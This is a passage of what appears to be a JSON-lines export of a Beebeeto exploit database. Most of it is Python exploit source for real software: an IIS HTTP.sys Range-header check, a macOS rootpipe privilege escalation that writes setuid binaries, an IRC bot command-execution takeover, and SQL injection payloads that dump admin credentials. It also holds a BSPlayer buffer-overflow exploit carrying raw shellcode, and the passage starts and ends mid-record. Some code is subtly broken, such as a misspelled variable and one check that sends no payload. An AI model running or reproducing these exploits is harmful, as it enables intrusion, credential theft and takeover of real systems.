timeout=timeout)\r\n        if not r.headers.get('server') or \"Microsoft\" not in r.headers.get('server'):\r\n            args['poc_ret']['error'] = '[-] Not IIS'\r\n            return args\r\n\r\n        hexAllFfff = '18446744073709551615'\r\n        headers.update({\r\n            'Host': 'stuff',\r\n            'Range': 'bytes=0-' + hexAllFfff,\r\n        })\r\n        r = requests.get(url, verify=False, headers=headers, timeout=timeout)\r\n        if \"Requested Range Not Satisfiable\" in r.content:\r\n            print \"[+] Looks Vulnerability!\"\r\n            args['success'] = True\r\n            args['poc_ret']['vulnerability'] = '%s:%d' % (target, port)\r\n        elif \"The request has an invalid header name\" in r.content:\r\n            args['poc_ret']['error'] = \"[-] Looks Patched\"\r\n        else:\r\n            args['poc_ret']['error'] = \"[-] Unexpected response, cannot discern patch status\"\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "\u5f71\u54cd\u8303\u56f4:\r\n    Windows7\r\n    Windows8\r\n    Windows server 2008\r\n    Windows server 2012\r\n\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\u5b58\u5728\u4e8e HTTP \u534f\u8bae\u5806\u6808 (HTTP.sys) \u4e2d\uff0c\u5f53 HTTP.sys \u672a\u6b63\u786e\u5206\u6790\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\r\n\u65f6\u4f1a\u5bfc\u81f4\u6b64\u6f0f\u6d1e\u3002 \u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u5728\u7cfb\u7edf\u5e10\u6237\u7684\u4e0a\u4e0b\u6587\u4e2d\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n\u82e5\u8981\u5229\u7528\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u5fc5\u987b\u5c06\u7ecf\u7279\u6b8a\u8bbe\u8ba1\u7684 HTTP \u8bf7\u6c42\u53d1\u9001\u5230\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002 \u901a\u8fc7\u4fee\u6539 Windows HTTP \u5806\u6808\u5904\u7406\r\n\u8bf7\u6c42\u7684\u65b9\u5f0f\uff0c\u5b89\u88c5\u66f4\u65b0\u53ef\u4ee5\u4fee\u590d\u6b64\u6f0f\u6d1e\u3002", "app_name": "IIS", "id": "poc-2015-0081", "layer4_protocol": null}
+{"create_date": "2015-04-10 11:45:23", "name": "Mac OS X rootpipe \u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e (CVE-2015-1130) Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 5, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Mac OS X \u63d0\u6743\u6f0f\u6d1e,Mac OS X rootpipe Local Privilege Escalation Vulnerability,CVE-2015-1130", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport os\r\nimport objc\r\nimport ctypes\r\nimport platform\r\n\r\nfrom Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions\r\nfrom Foundation import NSAutoreleasePool\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0079',\r\n            'name': 'Mac OS X rootpipe \u672c\u5730\u6743\u9650\u63d0\u5347\u6f0f\u6d1e (CVE-2015-1130) Exploit',\r\n            'author': 'Emil Kvarnhammar',\r\n            'create_date': '2015-04-10',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'local',\r\n            'port': [0],\r\n            'layer4_protocol': [],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Mac OS X',\r\n            'vul_version': ['10.7.5', '10.8.2', '10.9.5', '10.10.2'],\r\n            'type': 'Other',\r\n            'tag': ['Mac OS X \u63d0\u6743\u6f0f\u6d1e', 'Mac OS X rootpipe Local Privilege Escalation Vulnerability',\r\n                    'CVE-2015-1130',],\r\n            'desc': '''\r\n                    PoC exploit code for rootpipe (CVE-2015-1130)\r\n                    Created by Emil Kvarnhammar, TrueSec\r\n                    Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2\r\n                    # Usage: python exploit.py -t bashtest -d bashroot\r\n                    ''',\r\n            'references': [\r\n                    'http://www.exploit-db.com/exploits/36692/',\r\n                    'http://drops.wooyun.org/tips/5566',\r\n            ],\r\n        },\r\n    }\r\n\r\n    def _init_user_parser(self):  # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n        self.user_parser.add_option('-d','--dest_binary',\r\n                                    action='store', dest='dest_binary', type='string', default=None,\r\n                                    help='dest_binary')\r\n\r\n\r\n    @staticmethod\r\n    def load_lib(append_path):\r\n        return ctypes.cdll.LoadLibrary(\"/System/Library/PrivateFrameworks/\" + append_path);\r\n\r\n    @staticmethod\r\n    def use_old_api():\r\n        return re.match(\"^(10.7|10.8)(.\\d)?$\", platform.mac_ver()[0])\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        source_binary = args['options']['target']\r\n        dest_binary = os.path.realpath(args['options']['dest_binary'])\r\n\r\n        if not os.path.exists(source_binary):\r\n            raise Exception(\"file does not exist!\")\r\n\r\n        pool = NSAutoreleasePool.alloc().init()\r\n\r\n        attr = NSMutableDictionary.alloc().init()\r\n        attr.setValue_forKey_(04777, NSFilePosixPermissions)\r\n        data = NSData.alloc().initWithContentsOfFile_(source_binary)\r\n\r\n        print \"[*] will write file\", dest_binary\r\n\r\n        if cls.use_old_api():\r\n            adm_lib = cls.load_lib(\"/Admin.framework/Admin\")\r\n            Authenticator = objc.lookUpClass(\"Authenticator\")\r\n            ToolLiaison = objc.lookUpClass(\"ToolLiaison\")\r\n            SFAuthorization = objc.lookUpClass(\"SFAuthorization\")\r\n\r\n            authent = Authenticator.sharedAuthenticator()\r\n            authref = SFAuthorization.authorization()\r\n\r\n            # authref with value nil is not accepted on OS X <= 10.8\r\n            authent.authenticateUsingAuthorizationSync_(authref)\r\n            st = ToolLiaison.sharedToolLiaison()\r\n            tool = st.tool()\r\n            tool.createFileWithContents_path_attributes_(data, dest_binary, attr)\r\n        else:\r\n            adm_lib = cls.load_lib(\"/SystemAdministration.framework/SystemAdministration\")\r\n            WriteConfigClient = objc.lookUpClass(\"WriteConfigClient\")\r\n            client = WriteConfigClient.sharedClient()\r\n            client.authenticateUsingAuthorizationSync_(None)\r\n            tool = client.remoteProxy()\r\n\r\n            tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)\r\n\r\n        print \"[+] Done!\"\r\n        del pool\r\n        args['success'] = True\r\n        args['poc_ret']['dest_binary'] = dest_binary\r\n        return args\r\n\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "PoC exploit code for rootpipe (CVE-2015-1130)\r\nCreated by Emil Kvarnhammar, TrueSec\r\nTested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2\r\n# Usage: python exploit.py -t bashtest -d bashroot", "app_name": "Mac OS", "id": "poc-2015-0079", "layer4_protocol": null}
+{"create_date": "2015-04-07 10:25:59", "name": "w3tw0rk / Pitbull Perl IRC Bot \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "foundu", "rank": 4, "port": null, "vul_type": "\u4ee3\u7801\u6267\u884c", "tag": "w3tw0rk / Pitbull Perl IRC Bot \u6f0f\u6d1e,w3tw0rk / Pitbull Perl IRC Bot Vulnerability", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport socket\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0077',\r\n            'name': 'w3tw0rk / Pitbull Perl IRC Bot \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e Exploit',\r\n            'author': 'foundu',\r\n            'create_date': '2015-04-07',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [6667],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'w3tw0rk / Pitbull Perl IRC',\r\n            'vul_version': ['*'],\r\n            'type': 'Code Execution',\r\n            'tag': ['w3tw0rk / Pitbull Perl IRC Bot \u6f0f\u6d1e', 'w3tw0rk / Pitbull Perl IRC Bot Vulnerability'],\r\n            'desc': '''\r\n                    pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot\r\n                    that takes over the owner of a bot which then allows Remote Code Execution.\r\n                    ''',\r\n            'references': ['http://www.exploit-db.com/exploits/36652/',\r\n            ],\r\n        },\r\n    }\r\n\r\n    def _init_user_parser(self):  # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n        self.user_parser.add_option('-c','--channel',\r\n                                    action='store', dest='channel', type='string', default=None,\r\n                                    help='IRC channel')\r\n        self.user_parser.add_option('-n','--nick',\r\n                                    action='store', dest='nick', type='string', default='beebeeto',\r\n                                    help='IRC nick')\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        #irc server connection settings\r\n        server = args['options']['target']  # IRC Server\r\n        botnick = args['options']['nick']   # admin payload for taking over the w3wt0rk bot\r\n        channel = \"#%s\"%args['options']['channel']  #channel where the bot is located\r\n\r\n        irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket\r\n        print \"connecting to: \" + server\r\n        irc.connect((server, 6667)) #connects to the server\r\n        irc.send(\"USER \"+ botnick +\" \"+ botnick +\" \"+ botnick +\" :I eat w3tw0rk bots!\\n\") #user authentication\r\n        irc.send(\"NICK \"+ botnick +\"\\n\") #sets nick\r\n        irc.send(\"JOIN \"+ channel +\"\\n\") #join the chan\r\n        irc.send(\"PRIVMSG \"+channel+\" :!bot @system 'uname -a' \\n\") #send the payload to the bot\r\n\r\n        #puts it in a loop\r\n        while True:\r\n            text = irc.recv(2040)\r\n            print text  #print text to console\r\n            if text.find('PING') != -1:                       #check if 'PING' is found\r\n                irc.send('PONG ' + text.split() [1] + '\\r\\n') #returnes 'PONG' back to the server (prevents pinging out!)\r\n            if text.find('!quit') != -1: #quit the Bot\r\n                irc.send (\"QUIT\\r\\n\") \r\n                return args\r\n            if text.find('Linux') != -1:                         \r\n                irc.send(\"PRIVMSG \"+channel+\" :The bot answers to \"+botnick+\" which allows command execution \\r\\n\")\r\n                irc.send (\"QUIT\\r\\n\")\r\n                args['success'] = True\r\n                return args\r\n        return args\r\n\r\n    exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot\r\nthat takes over the owner of a bot which then allows Remote Code Execution.", "app_name": "Other", "id": "poc-2015-0077", "layer4_protocol": null}
+{"create_date": "2015-04-06 16:28:12", "name": "Elastix 2.x /a2billing/customer/iridium_threed.php BLIND SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 0, "author": "Ca2fux1n", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "Elastix\u6f0f\u6d1e,SQL\u6ce8\u5165\u6f0f\u6d1e,/iridium_threed.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport time\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0076',\r\n            'name': 'Elastix 2.x /a2billing/customer/iridium_threed.php BLIND SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'ca2fux1n',\r\n            'create_date': '2015-03-15',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Elastix',\r\n            'vul_version': ['2.x'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['Elastix\u6f0f\u6d1e', 'SQL\u6ce8\u5165\u6f0f\u6d1e', '/iridium_threed.php', 'php'],\r\n            'desc': '''\r\n                    Vulnerable Source Code snippet in \"a2billing/customer/iridium_threed.php\"\r\n                    ''',\r\n            'references': ['http://www.exploit-db.com/exploits/36305/',\r\n            ],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/a2billing/customer/iridium_threed.php'\r\n        payload = '?transactionID=-1 and 1=benchmark(2000000,md5(1))'\r\n        start_time = time.time()\r\n        if args['options']['verbose']:\r\n            print '[+] Requset:' + verify_url\r\n            print '[+] Payload:' + payload\r\n        req = requests.get(verify_url + payload)\r\n        if req.status_code == 200 and time.time() - start_time > 5:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url + paylaod\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "Vulnerable Source Code snippet in \"a2billing/customer/iridium_threed.php\"", "app_name": "Other", "id": "poc-2015-0076", "layer4_protocol": null}
+{"create_date": "2015-04-01 14:13:19", "name": "\u7528\u53cbNC-IUFO\u7cfb\u7edf /epp/detail/publishinfodetail.jsp SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Ca2fux1n", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "\u7528\u53cbNC-IUFO\u6f0f\u6d1e,/epp/detail/publishinfodetail.jsp,SQL Injection,JSP", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0075',\r\n            'name': '\u7528\u53cbNC-IUFO\u7cfb\u7edf /epp/detail/publishinfodetail.jsp SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'ca2fux1n',\r\n            'create_date': '2015-03-31',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': '\u7528\u53cbNC-IUFO',\r\n            'vul_version': ['*'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['\u7528\u53cbNC-IUFO\u6f0f\u6d1e', '/epp/detail/publishinfodetail.jsp', 'SQL Injection', 'JSP'],\r\n            'desc': 'param `pk_message` is not filterd',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-089208'],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        url = url if url[-1] != '/' else url[:-1]\r\n        payload = (\"/epp/detail/publishinfodetail.jsp?pk_message=1002F410000000019JNX%27%20\"\r\n                   \"AND%203814=(SELECT%20UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(99)||\"\r\n                   \"CHR(122)||CHR(103)||CHR(113)||(SELECT%20(CASE%20WHEN%20(3814=3814)%20THEN\"\r\n                   \"%201%20ELSE%200%20END)%20FROM%20DUAL)||CHR(113)||CHR(110)||CHR(111)||CHR(105)\"\r\n                   \"||CHR(113)||CHR(62)))%20FROM%20DUAL)%20AND%20%27vdoA%27=%27vdoA\")\r\n        verify_url = url + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: %s' % verify_url\r\n        req = requests.get(verify_url)\r\n        content = req.content\r\n        if req.status_code == 500 and 'qczgq1qnoiq' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == \"__main__\":\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "param `pk_message` is not filterd", "app_name": "\u7528\u53cb\uff08Yonyou\uff09", "id": "poc-2015-0075", "layer4_protocol": null}
+{"create_date": "2015-03-30 17:08:36", "name": "ShopBuilder /?m=product&s=list&ptype SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "foundu", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "ShopBuilder\u6f0f\u6d1e,/?m=product&s=list&ptype,SQL Injection,ShopBuilder", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport requests\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0074',\r\n            'name': 'ShopBuilder /?m=product&s=list&ptype SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'foundu',\r\n            'create_date': '2015-03-30',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'ShopBuilder',\r\n            'vul_version': ['*'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['ShopBuilder\u6f0f\u6d1e', '/?m=product&s=list&ptype', 'SQL Injection', 'ShopBuilder'],\r\n            'desc': '?m=product&s=list&ptype=0\uff0csqli=ptype',\r\n            'references': ['http://www.wooyun.org/bugs/wooyun-2014-080770'],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        url = args['options']['target']\r\n        payload = (\"/?m=product&s=list&ptype=0%27%20and%201%3Dupdatexml%281%2Cconcat%280x5c%2Cmd5\"\r\n                   \"%28222222%29%29%2C1%29%23\")\r\n        verify_url = url + payload\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url\r\n        content = requests.get(url).content\r\n        if 'e3ceb5881a0a1fdaad01296d7554868d' in content:\r\n            args['success'] = True\r\n            args['poc_ret']['vul_url'] = verify_url\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "?m=product&s=list&ptype=0\uff0csqli=ptype", "app_name": "ShopBuilder", "id": "poc-2015-0074", "layer4_protocol": null}
+{"create_date": "2015-03-27 19:57:52", "name": "Southidc \u5357\u65b9\u6570\u636e 11.0 /news_search.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Ca2fux1n", "rank": 3, "port": null, "vul_type": "SQL\u6ce8\u5165", "tag": "southidc,news_search.asp,SQL Injection,\u5357\u65b9\u6570\u636e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0073',\r\n            'name': 'Southidc \u5357\u65b9\u6570\u636e 11.0 /news_search.asp SQL\u6ce8\u5165\u6f0f\u6d1e POC',\r\n            'author': 'ca2fux1n',\r\n            'create_date': '2015-03-24',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'southidc',\r\n            'vul_version': ['11.0'],\r\n            'type': 'SQL Injection',\r\n            'tag': ['southidc', 'news_search.asp', 'SQL Injection', '\u5357\u65b9\u6570\u636e'],\r\n            'desc': 'southidc v10.0\u5230v11.0\u7248\u672c\u4e2dnews_search.asp\u6587\u4ef6\u5bf9key\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002',\r\n            'references': ['http://sebug.net/vuldb/ssvid-62399'],\r\n        },\r\n    }\r\n\r\n\r\n    @classmethod\r\n    def verify(cls, args):\r\n        verify_url = args['options']['target'] + '/news_search.asp?'\r\n        payload = (\"key=7'%20Union%20select%200,username%2bchr(124)%2bpassword,\"\r\n                   \"2,3,4,5,6,7,8,9%20from%20admin%20where%1%20or%20''='&otype=title&Submit=%CB%D1%CB%F7\")\r\n        req = urllib2.Request(verify_url + payload)\r\n        res = urllib2.urlopen(req)\r\n        content = res.read()\r\n        if args['options']['verbose']:\r\n            print '[*] Request URL: ' + verify_url + payload\r\n        if res.code == 200:\r\n            pattern = re.compile(r'.*?\\\">(?P<username>[a-zA-Z0-9]+)\\|(?P<password>[a-zA-Z0-9]+)',re.I|re.S)\r\n            match = pattern.match(content)\r\n            if match:\r\n               args['success'] = True\r\n               args['poc_ret']['vul_url'] = verify_url + payload\r\n        return args\r\n\r\n    exploit = verify\r\n\r\nif __name__ == '__main__':\r\n    from pprint import pprint\r\n\r\n    mp = MyPoc()\r\n    pprint(mp.run())", "desc": "southidc v10.0\u5230v11.0\u7248\u672c\u4e2dnews_search.asp\u6587\u4ef6\u5bf9key\u53c2\u6570\u6ca1\u6709\u9002\u5f53\u8fc7\u6ee4\uff0c\u5bfc\u81f4SQL\u6ce8\u5165\u6f0f\u6d1e\u3002", "app_name": "Southidc", "id": "poc-2015-0073", "layer4_protocol": null}
+{"create_date": "2015-03-25 14:20:07", "name": "Bsplayer 2.68 Universal HTTP Response Exploit", "level": "\u9ad8\u5371", "batchable": 0, "author": "\u96f7\u8702", "rank": 4, "port": null, "vul_type": "\u7f13\u51b2\u533a\u6ea2\u51fa", "tag": "Bsplayer\u6f0f\u6d1e,Bsplayer\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e,HTTP Response Exploit", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport sys\r\nimport socket\r\nimport urlparse\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n    poc_info = {\r\n        # poc\u76f8\u5173\u4fe1\u606f\r\n        'poc': {\r\n            'id': 'poc-2015-0072',\r\n            'name': 'Bsplayer 2.68 Universal HTTP Response Exploit',\r\n            'author': 'fady_osman',\r\n            'create_date': '2015-03-24',\r\n        },\r\n        # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n        'protocol': {\r\n            'name': 'http',\r\n            'port': [80],\r\n            'layer4_protocol': ['tcp'],\r\n        },\r\n        # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n        'vul': {\r\n            'app_name': 'Bsplayer',\r\n            'vul_version': ['2.68'],\r\n            'type': 'Buffer Overflow',\r\n            'tag': ['Bsplayer\u6f0f\u6d1e', 'Bsplayer\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e', 'HTTP Response Exploit'],\r\n            'desc': '''\r\n                    Bsplayer suffers from a buffer overflow vulnerability when processing the HTTP response when opening a URL.\r\n                    In order to exploit this bug I partially overwrited the seh record to land at pop pop ret instead of the full\r\n                    address and then used backward jumping to jump to a long jump that eventually land in my shellcode.\r\n\r\n                    Tested on : windows xp sp1 - windows 7 sp1 - Windows 8 Enterprise it might work in other versions as well just give it a try :)\r\n\r\n                    My twitter: @fady_osman\r\n                    My youtube: https://www.youtube.com/user/cutehack3r\r\n                    ''',\r\n            'references': ['http://www.exploit-db.com/exploits/36477/',\r\n            ],\r\n        },\r\n    }\r\n\r\n    def _init_user_parser(self):  # \u5b9a\u5236\u547d\u4ee4\u884c\u53c2\u6570\r\n        self.user_parser.add_option('-p','--port',\r\n                                    action='store', dest='port', type='string', default=80,\r\n                                    help='about port msg.')\r\n\r\n\r\n    @classmethod\r\n    def exploit(cls, args):\r\n        s = socket.socket()         # Create a socket object\r\n        url = urlparse.urlparse(args['options']['target']).netloc\r\n        host = socket.gethostbyname(url)   # Ip to listen to.\r\n        port = args['options']['port']     # Reserve a port for your service.\r\n        s.bind((host, port))         # Bind to the port\r\n        if args['options']['verbose']:\r\n            print \"[*] Listening on port \" + str(port)\r\n        s.listen(10)                 # Now wait for client connection.\r\n        c, addr = s.accept()         # Establish connection with client.\r\n        # Sending the m3u file so we can reconnect to our server to send both the flv file and later the payload.\r\n        if args['options']['verbose']:\r\n            print(('[*] Sending the payload first time', addr))\r\n        c.recv(1024)\r\n        #seh and nseh.\r\n        buf =  \"\"\r\n        buf += \"\\xbb\\xe4\\xf3\\xb8\\x70\\xda\\xc0\\xd9\\x74\\x24\\xf4\\x58\\x31\"\r\n        buf += \"\\xc9\\xb1\\x33\\x31\\x58\\x12\\x83\\xc0\\x04\\x03\\xbc\\xfd\\x5a\"\r\n        buf += \"\\x85\\xc0\\xea\\x12\\x66\\x38\\xeb\\x44\\xee\\xdd\\xda\\x56\\x94\"\r\n        buf += \"\\x96\\x4f\\x67\\xde\\xfa\\x63\\x0c\\xb2\\xee\\xf0\\x60\\x1b\\x01\"\r\n        buf += \"\\xb0\\xcf\\x7d\\x2c\\x41\\xfe\\x41\\xe2\\x81\\x60\\x3e\\xf8\\xd5\"\r\n        buf += \"\\x42\\x7f\\x33\\x28\\x82\\xb8\\x29\\xc3\\xd6\\x11\\x26\\x76\\xc7\"\r\n        buf += \"\\x16\\x7a\\x4b\\xe6\\xf8\\xf1\\xf3\\x90\\x7d\\xc5\\x80\\x2a\\x7f\"\r\n        buf += \"\\x15\\x38\\x20\\x37\\x8d\\x32\\x6e\\xe8\\xac\\x97\\x6c\\xd4\\xe7\"\r\n        buf += \"\\x9c\\x47\\xae\\xf6\\x74\\x96\\x4f\\xc9\\xb8\\x75\\x6e\\xe6\\x34\"\r\n        buf += \"\\x87\\xb6\\xc0\\xa6\\xf2\\xcc\\x33\\x5a\\x05\\x17\\x4e\\x80\\x80\"\r\n        buf += \"\\x8a\\xe8\\x43\\x32\\x6f\\x09\\x87\\xa5\\xe4\\x05\\x6c\\xa1\\xa3\"\r\n        buf += \"\\x09\\x73\\x66\\xd8\\x35\\xf8\\x89\\x0f\\xbc\\xba\\xad\\x8b\\xe5\"\r\n        buf += \"\\x19\\xcf\\x8a\\x43\\xcf\\xf0\\xcd\\x2b\\xb0\\x54\\x85\\xd9\\xa5\"\r\n        buf += \"\\xef\\xc4\\xb7\\x38\\x7d\\x73\\xfe\\x3b\\x7d\\x7c\\x50\\x54\\x4c\"\r\n        buf += \"\\xf7\\x3f\\x23\\x51\\xd2\\x04\\xdb\\x1b\\x7f\\x2c\\x74\\xc2\\x15\"\r\n        buf += \"\\x6d\\x19\\xf5\\xc3\\xb1\\x24\\x76\\xe6\\x49\\xd3\\x66\\x83\\x4c\"\r\n        buf += \"\\x9f\\x20\\x7f\\x3c\\xb0\\xc4\\x7f\\x93\\xb1\\xcc\\xe3\\x72\\x22\"\r\n        buf += \"\\x8c\\xcd\\x11\\xc2\\x37\\x12\"\r\n\r\n        jmplong = \"\\xe9\\x85\\xe9\\xff\\xff\"\r\n        nseh = \"\\xeb\\xf9\\x90\\x90\"\r\n        # Partially overwriting the seh record (nulls are ignored).\r\n        seh = 